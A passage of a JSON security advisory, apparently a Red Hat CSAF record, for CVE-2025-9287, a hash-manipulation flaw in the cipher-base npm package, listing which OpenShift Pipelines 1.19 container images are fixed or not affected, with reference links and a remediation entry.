"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389932"
}
],
"notes": [
{
"category": "description",
"text": "An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid\u00a0value calculations,\u00a0hanging and\u00a0rewinding the\u00a0hash state, including\u00a0turning a tagged hash\u00a0into an untagged\u00a0hash, for malicious JSON-stringifyable\u00a0inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cipher-base: Cipher-base hash manipulation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "RHBZ#2389932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389932"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/pull/23",
"url": "https://github.com/browserify/cipher-base/pull/23"
},
{
"category": "external",
"summary": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
"url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
}
],
"release_date": "2025-08-20T21:43:56.548000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
